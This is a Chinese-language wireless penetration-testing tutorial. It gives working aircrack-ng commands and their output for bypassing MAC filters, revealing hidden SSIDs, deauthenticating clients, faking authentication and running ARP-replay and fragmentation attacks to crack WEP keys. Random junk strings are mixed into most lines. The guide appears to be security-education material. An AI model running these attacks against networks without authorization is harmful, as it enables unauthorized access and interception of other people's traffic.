无线网络渗透（-）

  目录 $p)e.ZMgE  
_7bQR 7s  
F`e o3z  
[0x00] - 简介 F5s`AjU  
[0x01] - 无线网络安全 q}r{%ypf  
[0x02] - 突破简单防御
&0k`=?v$  
k+% c8w 9  
[0x02a] - 绕过 MAC 过滤 vo!QJ  
[0x02b] - 发觉隐藏的 SSID wN2D{J
j  
[0x02c] - 嗅探空中信息 =}OcMM`f  
ZQI;b0C  
[0x03] - 破解工具 ,1e\}^  
mXK7y.9\  
[0x03a] - Aircrack-ng 套件 Cb i;CF\{  
[0x03b] - 使用 airdecap-ng 解密数据包 0o]T6
  
[0x03c] - 使用 airdecloak-ng 伪装数据包 /`+ubF
Xc  
[0x03d] - 空中破解 101 o! Y61S(  
HvJ-P#  
[0x04] - 拥有 WEP 密钥的简单技术（非注入） _`d=0l*8  
fb_q2p} G  
[0x04a] - 捕捉方法
::
k cV'*  
[0x04b] - 破解方法 ?!;i/h*{  
01">
$  
[0x05] - 拥有 WEP 密钥的先进技术（注入方法） #m 6W7_  
['DYP-1J  
J5L[)Gd)D  
P:k!dRb9{  
!~!\=e
tm  
"Ax#x  
[0x05a] - 监听模式 <qjolMO`  
[0x05b] - 欺骗认证 M|IgG:a;T  
[0x05c] - ARP 重播攻击 ]>oI3
&6s  
[0x05d] - 分裂攻击 I7?s+vyds  
[0x05e] - Korek ChopChop 攻击 tvR|!N }  
[0x05f] - 数据包伪造 f,:2\b?.  
[0x05g] - 交互式 ARP 重播攻击 sZ%wQqy~k  
[0x05h] - 破解 WEP 密钥 Bs';!,=  
jM;? );Dd  
[0x06] - 破解 WEP 的总结脚本 5Tiap8x+<  
tW=oAy  
[0x07] - 拥有 WPA-PSK/WPA2-PSK 密钥 `V=F>s$W  
[0x08] - 无线网企业漏洞利用(WPA-TLS/TTLS/PEAP) !DZ4C.  
[0x09] - CISCO LEAP 漏洞利用 #(1R:z\:  
[0x10] - Karmetasploit 大规模利用 -|( q 9B  
[0x11] - 旅程的尾声 (&xIB F_6  
eGi|S'L'  
XE
?,)8  
<c]?  
[0x00] - 简介 i$dF0.}Q  
1SY3  
我曾经在博客内写过了关于无线网驾车作战的技术信息。在本文将详细介绍实用的 HACK 技术来打破无线安全。建议读者应具备无线网基础知识及无线操作。 -14~f)%NQ*  
本文包含 12 个章节，但实际内容是在 10 个章节中，从 0x02 到 0x10。在 0x02 中，我们讨论无线网络的基本攻 fp'%lbk=  
击。章节 0x03 的内容是有关使用的工具。在第 0x04、0x05 和 0x06 章节中，我们提供信息以破解 WEP。章节 0x07、 d1hXzJs  
0x08 和 0x09 是破解 WPA 和 WPA2 的细节。章节 0x10 是关于 Metasploit 在使用无线网络通过 Rogue AP 的细节。 %nT&  
W24n%Ps  
8npjQ;%4>  
[*v- i%U}  
[0x01] - 无线网络安全 ah|`),o(k  
_T(MMc  
相对于有线网络，无线网络有严重的缺点，因为它使用天空作为媒介。因此，黑客有能力通过中间人或其他方法进行攻击。 p5 )+ R/  
axL
O: Q,  
因此，无线的安全问题直至现在都十分关注，按照无线网络的安全标准可划分为： -`d(>ok  
LAPC L&Z  
- WEP uW^W/S%'  
- WPA-PSK jW0aIS2O  
- WPA2-PSK o>oZh1/\T,  
- WPA-802.1x UCS`09KNJ  
- WPA2-802.1x p="K4E8~H  
4&'_~qU  
uc-Go 6W  
rBovC  
WEP 是原始安全标准的无线网络，但它很容易破解。WPA 和 WPA2 是主动提供无线安全，解决安全漏洞的 WEP。WPA 和 WPA2 仍划分共享密钥和 802.1x，用于个人和企业。除了这些标准外，还有其他的机制，以加强无线安全，如隐藏的 SSID、MAC 过滤。我们将在此文档中谈论 Hack 这些安全标准机制，也提供其他攻击方法。 SM
8m\c  
ljRR{HOl  
|4u?Q+k%%  
@iD5
X.c  
[0x02] - 突破简单防御 }t9A#GOz  
]z_C7Y"4BR  
]6 vqgu  
9\[A%jp#K@  
&+>)H$5  
[0x02a] - 绕过 Mac 过滤 ?{M!syD<  
JdW:%,sv  
A`qb
5LLJ)  
在接入点中存储合法的客户端 MAC 地址是一个基本的安全机制。当有认证请求接入点，接入点将进行比较 MAC 地址贮存器中的 MAC 地址请求。如果结果是匹配的，将验证成功，否则失败。然而，这种方法很容易绕过，攻击者只需改变 MAC 地址的一些命令即可。 *^
5..0du  
我们有一个案例研究绕过 MAC 过滤攻击。有一天，我们为一家公司做无线网络渗透测试。首先，我们使用 kismet 发觉围绕公司的接入点。这让我们知道每一个接入点的确切位置。然后，我们使用 airodump-ng 固定渠道捕捉数据包。airodump-ng 确定目标渠道可以提高效率。我们知道来自 airodump-ng 接入点使用开放式身份验证，它不使用任何加密。因此，我们尝试连接到接入点，但拒绝我们的认证请求。我们得出这样的结论：这个网络使用 MAC 过滤。从 airodump-ng 可以看到，有客户交往接入点。我们立即改变我们的 MAC 地址，是一样相关的客户端并尝试再次连接。在这个时候，一切都很好。我们可以连接到接入点。此外，我们能够获得内部网络并对内部服务器运行任何工具，如 nmap、nessus、exploit。这是非常危险的。 k 1   
K;_.WzWD=  
9p5{,9.3*  
>{]mN5  
[0x02b] - 发觉隐藏的 SSID YOHYXhc{S  
Kzd`|+?'`M  
一些环境中，无线管理员配置隐藏的 SSID。因此，攻击者不能知道网络 SSID 也无法连接到该网络。在 airodump 中，它显示<lenght ?> 哪个数字是 SSID 长度。 h.W;Dmf6]  
e!(0y)*  
只有这样才能知道会话请求的 SSID 名称。在这个数据包传输时，就会发生一个合法的客户端连接到网络。 &i~AXNw  
boR&'yX  
我们能够影响合法客户端并重新发送验证数据包连接接入点，客户端通过使用 aireplay-ng。该命令像这样： cn4C K. ?  
B R-(@  
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 Sr`gQ#b@r}  
21:56:47    Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 3 T3p[q4  
21:56:47    Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] bTn7$EG  
d&p]O  
发送验证数据包到客户端后，客户端会重新验证并重新会话。 e,}]K'!t  
3?vasL  
Airodump-ng 可以检测这一进程，并知道这个网络的 SSID。 F` if HO  
}Vpr7_  
4><b3r;T'  
?zKVXK7}0  
N2VF_[l  
[0x02c] - 嗅探空中信息 [ed%"f  
8Us5Oi  
-0Q:0wU  
ih?_ f W  
这个主题不使用任何技术或深层知识。许多无线网络使用非公开验证加密机制。攻击者只需要从空中监听并找到像 http、telnet、ftp etc 会话的可信信息数据包。 *0y+=,"QU  
` BH8v  
我们能够使用 airodump-ng 嗅探出其他数据。 r6Z&i^cMe  
B7TA:K  
aT F}  
sb_
>D`>  
"gdm RE{x  
[0x03] - 破解工具 @.-g  
BpCzmU  
@4h .?  
我建议使用 Aircrack-NG，Aircrack-NG 是一个一次抓获足够的数据包进行破解 802.11 WEP 和 WPA-PSK 密钥。 mY.[AIB  
它实现了标准的 FMS 攻击和一些最佳化 KoreK 攻击，以及全新的 PTW 攻击，从而相比其他 WEP 破解工具攻击快得多。事实上，Aircrack-ng 是一套审计无线网络的工具。 '@HWp8+  
!$
St=!  
IQdiVj  
1bd(JL  
[0x03a] - Aircrack-ng 套件 }Fyf?TZ$T  
F%6al,8P  
TeG5|`t],  
在本教程，有四个工具在 aircrack-ng 套件中发挥着重要作用。 6ndt1W z  
 F[115/  
- airodump-ng: 用于捕捉数据包 |>GtClL  
使用 airodump-ng 首先每次打开监听模式，这使我们的网卡在首选的渠道具有注入能力。- aireplay-ng: 用于注入 qbHb 24I  
o de-authentication: 用于发送验证数据包到客户端o fake authentication: 用于执行伪造进程 Oh~J yrZy  
o interactive packet replay: 用于选择首选的数据包进行重播攻击o arp replay: 用于执行 ARP 协议自动重播攻击 # o)a`,f  
o Korek chopchop: 使用 Chopchop 技术生成密钥o fragment: 使用片段技术生成密钥 k%/Z.4vQG  
- packetforge-ng: 用于创建数据包 zhKb|SV  
- aircrack-ng: 用于恢复密钥 LnxJFc:1K  
nod?v2%   
更多详情： http://aircrack-ng.org/doku.php#aircrack-ng_suite1 e[y k
'E  
1N1MD@C?P  
8"LvkN/v^  
YT
}m 8Y  
@ bPQhn#(g  
[0x03b] - 使用 airdecap-ng 解密数据包 BE:HO^-.1  
ON~SZa  
vR3'B3y  
之后，我们得到 WEP 或 WPA 密钥，有时候我们要破译捕获的数据包。Aircrack 团队已经提供给我们工具。它是“airdecap-ng”。例子中的使用过程像这样： O2us+DhQ  
#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap 或 #airdecap-ng -e Workshop workshop-02.cap U{} bx  
BYyR-m  
主意：对于 WPA，airdecap-ng 只有文件包含四次握手才能返回成功的结果。 t`o-HWfS.  
&#F>%~<or  
7;) T;X  
(2[tQ`~  
%]h5\%@w  
b<P9@h~:  
[0x03c] - 使用 airdecloak-ng 伪装数据包 Pb]: i+c)  
G<#9`  
WolkW:(Cg  
伪装是一种扰乱破坏 WEP 密钥进程的技术。这种技术是通过加密的随机 WEP 密钥的网络注入数据包，这些数据包成为“chaff”。如果攻击者捕获这些数据包并进行破解破解，返回的结果是错误的或其他的结果。然而，aircrack 团队开发了一个工具来处理此技术，它被称为“airdecloak-ng”。 <kN4@bd;  
3vfm$sx@  
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap "-88bF~  
W,9. z%  
此命令返回两个文件： N_rz~$|@9  
- workshop-01-filtered.cap: 来自包含过滤包的特定接入点 }><Vc ouJ[  
- workshop-01-cloaked.cap: 来自包含加密数据包的特定接入点 3gV 17a  
6c,]N@,Zw  
1G$fU zS  
k&wCa<Rs~R  
2$?bLvk  
[0x03d] - 空中破解 101 Q>Voa&tYn  
I .jB^  
bnHQvCO3$  
PTW 攻击 (-z) +z}O*,M"q  
(aircrack-ng -z capture.cap), 只有 WEP 64/128 位工作，需要 ARP 请求/重播数据包，你必须从 airodump-ng 转储所有数据包。 w.Cw)# N  
$c"byQ[3S  
字典攻击 Attack (WPA/WPA2 语法) fy]z<SPhVJ  
(aircrack-ng -w pass.lst *.cap) :0@R(ct;>  

uq?((  
修改攻击 (-f) 7[z^0?Pygf  
一旦达到 2 millions IVs, 尝试修改“-f 4”。重试，每次增加 4。** 与此同时，不断收集数据。 7QV@lR<C2R  
RP[^1  
-KV)1kET  
_G3L+
St  
(bhMo^3/*  
[0x04] - 拥有 WEP 密钥的简单技术（非注入） Q /D?U[G  
zplAH!s5''  
WxPu{N  
有几种方法法破解 WEP 密钥。 m\*;Fx  
首先，我们应该准备支持监听模式的设备，可以注入到网络的数据包。之后，我们准备破解工具，我选择使用 aircrack-ng ;ctPe[5  
其主要思想是，收集大量加密的数据包，然后我们可以使用这些包破解 WEP 密钥。因此，有两种情况： 78M%[7Cq<i  
1. 该网络是高流量 PFR64HK2  
2. 该网络是低流量 j(aok5:e  
7QSr C/e  
有什么不同呢？ 813t=A  
当然，第一种情况下，我们只使用 airodump 收集的数据包和破解的密钥，但第二种情况下，我们要注入的数据包，以获取更多的数据包。我们为你介绍第一种，捕获和破解方法。然后我们谈论注入方法，只能使用于较弱的交换网络。 RnV#[bM{  
]mzghH:E  
t[e`wj+qz  
x)+ q$FB  
.gQYN2#zb  
=Ju%3ptH0  
[0x04a] - 捕捉方法 Jb;@'o6  
首先，收集数据包。64 位的 WEP 密钥，我们使用约 50000 个数据包和约 150,000 个 128 位的 WEP 密钥数据包。收集数据包的命令是 "J(T?|t  
x@*RF:\}  
#airodump-ng -w workshop rausb0 jjT)3 c:J[  
'Lu d=u{  
b?U2g?lN:  
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx f7_V ]  
$V870 <  
BSSID                                PWR RXQ    Beacons        #Data, #/s    CH    MB    ENC    CIPHER AUTH ESSID rtxG-a56Q  
jp+s[rRc\{  
xx:xx:xx:xx:xx:xx                     77     94          10905           11054           0     11     54. WEP    WEP       OPN    Workshop Je*hyi7  
?B32,AS@  
BSSID                                STATION                           PWR      Rate    Lost    Packets    Probes [QDM_n  
P>nz8NRq  
xx:xx:xx:xx:xx:xx    yy:yy:yy:yy:yy:yy                                  85     54-54              0           7747 wh2Ljskda8  
&gdhq~4#  
5~FXy{ZIH  
我们以后破解密钥会用到这个 “workshop-01.cap” 文件。 q[TGEgG  
2Tcc Iv  
我们可以在数据字段中确定有多少个数据包，大约 90%的数据包中的数据显示领域是我们需要的 IV 数据包。 m;cgX#k5  
o`M.v[O  
duV\Kt/g^  
)|,Zp`2/  
@/8O@^
 
[0x04b] - 破解方法 6<o2 0(?  
在我们收集足够的加密数据包之后，我们使用 aircrack-ng 恢复密钥。#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap Utj4f-M  
-b xx:xx:xx:xx:xx:xx 目标接入点 MAC 地址 6KE?@3;Om  
成功破解的结果如下所示所示： y:YJv x6&4  
wCt!.<, .  
S0WKEv@ Hn  
Opening workshop-01.cap | Zj=E$  
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. 8SN
4E  
KEY FOUND! [ 00:11:22:33:44 ] TFO4jji
C"  
Decrypted correctly: 100% ,56objaE  
?t [C?{'  
!'(
QF9%Q  
/DX6Hkkj%  
c JOT{  
}K|40oO5  
[0x05] - 拥有 WEP 密钥的先进技术（注入方法） P"a9+ti+'  
fzr0dcNgM  
这种方法没有必要在高流量的网络，但它是非常重要的低交换网络。我们必须注入数据包到接入点中，以产生新的数据包返回到客户端。 lbm ,#  
如果我们仔细考虑上面的方法，源 MAC 地址必须是相关联的，必需的数据包发送到用户端的接入点并且数据包必会引起接入点产生反应或其他包；通常我们应该针对 MAC 地址播送数据包。 -d *je{c |  
UF;iw  
我们可以得出选择数据包注入的必要条件的结论如下所示： O0QK `F/)*  
QFU1l"(qGk  
- MAC 地址关联到接入点 （可以通过伪装身份验证做到这一点）- 发送到用户端的接入点 （“To DS”标记设置为 1） k? !'OHmBL  
- 目标 MAC 地址是广播 （FF:FF:FF:FF:FF:FF） Y\ j5{;V  
-5GRit1q?  
数据包使用于所有要求 ARP 请求的广播。在 aircrack-ng 中，有 aireplay-ng 有一个选项，执行 ARP 重播攻击。这次攻击是为了捕捉 ARP 请求，然后重放它的接入点，以创建新的数据包。但是，如果在那个时候该网络没有 ARP 请求广播。现在，我们可以划分注入技术的 2 个场景。 :|N(:W>=$Y  
sh;>6xB  
- 网络有 ARP 请求。 THmmf_w@  
- 网络没有 ARP 请求。 3>%:%bP  
无论哪种情况下，我们必须执行注入相关 MAC 地址。现在，我们有两个选择。第一是改变我们的 MAC 地址，第二是做欺骗认证。 3?s1Yw>?  
,2]a<0m  
6.
k>J{G
G  
A;
gU@
8m  
[0x05a] - 监听模式 HBcL1wfS  
使用 airmon-ng 设置您的 wifi 监听模式，并准备注入数据包。#airmon-ng start wlan0 11 8}{W.np_  
4+q3 Kw  
设置 wlan0 监听模式信道 11，我们必须指定相同的信道为目标 AP 信道。 h.)o4(bO  
>_SqM!^v  
4{rj 4P?  
v_I)eac
z  
o>o! -uf  
[0x05b] - 欺骗认证 L(DDyA{bA  
}S6"$R  
h4tAaPcS+  
我们可以做的欺骗认证命令如下所示所示： ;l c/FV[/  
LyG&FOf?  
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 s|IC;C|  
`,$PRN"]  
-a xx:xx:xx:xx:xx:xx 接入点 MAC 地址 Qgxp q{y  
-h yy:yy:yy:yy:yy:yy 无线网卡 MAC 地址 Q<T+t0G\O-  
cA{7 *=G?  
如果我们成功获得结果，我们的 MAC 地址将联系特定的接入点。 4N8(WI"4S  
u_jhmKr~  
][1 iKT  
'|@?R|i0  
Q|(G -  
f7?IXDQ>!  
成功的结果如下所示： AI#.G7'
O  
[( *?  
00:00:00    Sending Authentication Request 36UUt!}p  
00:00:00    Authentication successful raJv $P  
00:00:00    Sending Association Request 7~!F3WT{  
00:00:00    Association successful :-) pB'{_{8aA  
;S+]Z!5LT  
"ifv1KZ#  
欺骗认证成功后，我们必须确定哪种类型的网络，我们正面临着选择适当的步骤来处理。 1"f)\FPGe  
x Tf|u  
vbEO pY CS  
_&e$?hY  
4WP@ F0@n3  
[0x05c] - ARP 重播攻击 7x#."6>Dy  
/~3kkM(Ty  
/a }` y  
我们可以使用 ARP 重播攻击的命令如下所示： SAhk`_  
@:t2mz:^i  
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 GTke<R  
nQ#NW8*Fs  
-b xx:xx:xx:xx:xx:xx 接入点 MAC 地址 p4vX3?&1W  
-h yy:yy:yy:yy:yy:yy 我们的无线网卡 MAC 地址 2]cU:j6G  
Aireplay-ng 可侦测 ARP 请求，并用它来自动进行重播攻击。发现的 ARP 请求，信息如下所示： tHV+#3h  
21:06:20    Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-0223-210620.cap Qv]>L4PO  
You should also start airodump-ng to capture replies. BHt9$$Z|  
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps) (BGflb  
MH/bJtNq  
** 在某些情况下，没有任何由 ARP 请求播出的接入点。所以，我们不能正常使用 ARP 重播攻击。 RG:_:%@%}  
v;(k7
 
我们必须从生成密钥流捕获的数据包，并使用密钥流伪造 ARP 请求数据包，然后重放，以接入点创建新的数据包。有两种方法用于生成密钥流，分为“chopchop 攻击”和“碎片攻击”。 'u3,+guz  
28>/#I9/]  
这两种方法可以用 aireplay-ng 执行。 PAXm  
ufJHC06  
\: R Akf<  
GYtp%<<9;  
)!Zm*(  
[0x05d] - 分裂攻击 H^+Znmo  
_Uhl4Mh  
碎片攻击是用来生成大小为 1500 字节的密钥流。因此，我们可以使用这个密钥流创建一个数据包，它的大小可达到 1500 字节。该碎片攻击命令为： @ b{$s  
d 9]zB-A  
#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 *d:$vaL  
t@jke  
')ZZ)&U>z  
H__'K/nH+  
AE=E"l1]  
该系统的响应结果如下所示： VyWzb  
aVp-Ps|r  
21:21:07    Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 21:21:07    Waiting for a data packet... d'[q2y?6N  
[0lO0ik>G  
($t;Xab  
Size: 90, FromDS: 1, ToDS: 0 (WEP) &3:<WU:U  
" :V@AT  
BSSID     =   00:1B:2F:3D:CB:D6 s?PB ]Tr
 
Dest. MAC       =   00:1A:73:37:E2:A3 oo|Nu+  
Source MAC      =   00:1B:2F:3D:CB:D6 oiQ:&$y  
7h`t-6<!q  
0x0000:   8842 2c00 001a 7337 e2a3 001b 2f3d cbd6                   .B,...s7..../=.. .M0pb^M  
0x0010:   001b 2f3d cbd6 20df 0000 b168 ff00 2872       ../=.. ....h..(r izR#XeBm  
0x0020:   7547 d03f 70d7 2d29 1397 7d3d ac16 382a    uG.?p.-)..}=..8* L$ZsNs+  
0x0030:    f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c 6uxF<  
0x0040:   5315 a328 87cb 0d4a b36a e5be 93c7 307a    S..(...J.j....0z M6y|;lh''c  
0x0050:   7bc2 18d7 2df5 94f2 5aed                      {...-...Z. d3NER}f4V  
I>lblI$ 7  
Use this packet ? zIr4!|X  
#I#_gjJkx  
GN+!o($  
我们必须回应“y”。 Nzb=h/;  
P>Ru  
$?On,U  
Use this packet ? y \mqrDaB  
+ZkJ{r0,(  
lDVgW}o@  
成功过程如下所示： %&eBkN!T  
Saving chosen packet in replay_src-0223-212107.cap Data packet found! XII' ,&  
Sending fragmented packet % @!hf!  
Got RELAYED packet!! D4*_/,}  
Thats our ARP packet! >AWWwq -  
Trying to get 384 bytes of a keystream n{=Ot^ ";  
Got RELAYED packet!! wdIJ?\/763  
Thats our ARP packet! ()Q q7/  
Trying to get 1500 bytes of a keystream oAv LSFn  
Got RELAYED packet!! 3pyE'9"f6  
Thats our ARP packet! eL [.;_  
Saving keystream in fragment-0223-212107.xor gCbS$Pw  
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream 3
4L1Gxf